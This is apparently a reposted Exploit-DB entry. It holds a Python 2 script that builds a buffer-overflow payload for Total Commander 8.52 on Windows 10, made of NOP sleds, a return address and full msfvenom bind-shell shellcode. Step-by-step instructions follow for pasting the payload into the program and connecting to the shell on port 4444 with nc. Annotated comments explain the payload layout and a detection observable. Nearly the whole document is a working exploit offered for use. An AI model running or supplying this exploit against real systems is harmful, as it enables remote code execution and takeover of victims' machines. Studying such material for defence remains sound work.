Total Commander 8.52 (Windows 10) – Local Buffer Overflow

  • 作者: VIKRAMADITYA
    日期: 2015-09-20
  • 来源:https://www.exploit-db.com/exploits/38243/
    #!/usr/bin/python
    # EXPLOIT TITLE: Total Commander 8.52 Buffer Overflow 
    # AUTHOR: VIKRAMADITYA "-OPTIMUS"
    # Credits: Un_N0n
    # Date of Testing: 19th September 2015
    # Download Link : http://tcmd852.s3-us-west-1.amazonaws.com/tc852x32_b1.exe
    # Tested On : Windows 10 
    # Steps to Exploit
    # Step 1: Execute this python script
    # Step 2: This script will create a file called time.txt
    # Step 3: Copy the contents of time.txt file
    # Step 4: Now open Total Commander 8.52
    # Step 5: Go To file > Change Attributes.
    # Step 6: In time field paste the contents of time.txt
    # Step 7: After 5 seconds connect to the target at port 4444 with ncat/nc 
    # The script's only side effect: write the crafted payload to time.txt in the
    # current working directory. This is Python 2 code: str literals are byte
    # strings, so writing them to a 'wb' handle works; under Python 3 the same
    # write raises TypeError (str is not bytes). `file` also shadows the Python 2
    # builtin of the same name, and the handle is not managed with `with`.
    file = open('time.txt' , 'wb');
    
    # Payload layout, as described in the author's trailing comment: 265 NOP bytes
    # up to the overwritten return address, a 4-byte little-endian address
    # (0x6d7624fe, labelled "Jmp eax" by the author), then 160 NOPs as a landing
    # pad in front of the shellcode.
    buffer = "\x90"*265 + "\xfe\x24\x76\x6d" + "\x90"*160 # 265 NOPS + Jmp eax + 160 NOPS + SHELLCODE + 10 NOPS
    
    # msfvenom -p windows/shell_bind_tcp -f c-b '\x00\x0a\x0d'
    # The block below is the msfvenom output for a Windows bind shell (per the
    # header comment it listens on TCP 4444); `-b` lists the bytes the encoder
    # must avoid, so 0x00, 0x0a and 0x0d never appear in it.
    # Detection note: nothing in this script touches the network. The host-side
    # observable is the Total Commander process opening a listening socket on
    # 4444 after the pasted value is processed.
    
    buffer += ("\xdb\xcb\xd9\x74\x24\xf4\x5a\x31\xc9\xbe\x97\xf8\xc7\x9d\xb1"
    "\x53\x31\x72\x17\x03\x72\x17\x83\x7d\x04\x25\x68\x7d\x1d\x28"
    "\x93\x7d\xde\x4d\x1d\x98\xef\x4d\x79\xe9\x40\x7e\x09\xbf\x6c"
    "\xf5\x5f\x2b\xe6\x7b\x48\x5c\x4f\x31\xae\x53\x50\x6a\x92\xf2"
    "\xd2\x71\xc7\xd4\xeb\xb9\x1a\x15\x2b\xa7\xd7\x47\xe4\xa3\x4a"
    "\x77\x81\xfe\x56\xfc\xd9\xef\xde\xe1\xaa\x0e\xce\xb4\xa1\x48"
    "\xd0\x37\x65\xe1\x59\x2f\x6a\xcc\x10\xc4\x58\xba\xa2\x0c\x91"
    "\x43\x08\x71\x1d\xb6\x50\xb6\x9a\x29\x27\xce\xd8\xd4\x30\x15"
    "\xa2\x02\xb4\x8d\x04\xc0\x6e\x69\xb4\x05\xe8\xfa\xba\xe2\x7e"
    "\xa4\xde\xf5\x53\xdf\xdb\x7e\x52\x0f\x6a\xc4\x71\x8b\x36\x9e"
    "\x18\x8a\x92\x71\x24\xcc\x7c\x2d\x80\x87\x91\x3a\xb9\xca\xfd"
    "\x8f\xf0\xf4\xfd\x87\x83\x87\xcf\x08\x38\x0f\x7c\xc0\xe6\xc8"
    "\x83\xfb\x5f\x46\x7a\x04\xa0\x4f\xb9\x50\xf0\xe7\x68\xd9\x9b"
    "\xf7\x95\x0c\x31\xff\x30\xff\x24\x02\x82\xaf\xe8\xac\x6b\xba"
    "\xe6\x93\x8c\xc5\x2c\xbc\x25\x38\xcf\xd3\xe9\xb5\x29\xb9\x01"
    "\x90\xe2\x55\xe0\xc7\x3a\xc2\x1b\x22\x13\x64\x53\x24\xa4\x8b"
    "\x64\x62\x82\x1b\xef\x61\x16\x3a\xf0\xaf\x3e\x2b\x67\x25\xaf"
    "\x1e\x19\x3a\xfa\xc8\xba\xa9\x61\x08\xb4\xd1\x3d\x5f\x91\x24"
    "\x34\x35\x0f\x1e\xee\x2b\xd2\xc6\xc9\xef\x09\x3b\xd7\xee\xdc"
    "\x07\xf3\xe0\x18\x87\xbf\x54\xf5\xde\x69\x02\xb3\x88\xdb\xfc"
    "\x6d\x66\xb2\x68\xeb\x44\x05\xee\xf4\x80\xf3\x0e\x44\x7d\x42"
    "\x31\x69\xe9\x42\x4a\x97\x89\xad\x81\x13\xb9\xe7\x8b\x32\x52"
    "\xae\x5e\x07\x3f\x51\xb5\x44\x46\xd2\x3f\x35\xbd\xca\x4a\x30"
    "\xf9\x4c\xa7\x48\x92\x38\xc7\xff\x93\x68")
    
    # 10 trailing NOP bytes after the shellcode (the "10 NOPS" in the layout comment).
    buffer += "\x90" *10
    
    # Write the assembled payload in one call, then release the handle.
    file.write(buffer)
    
    file.close()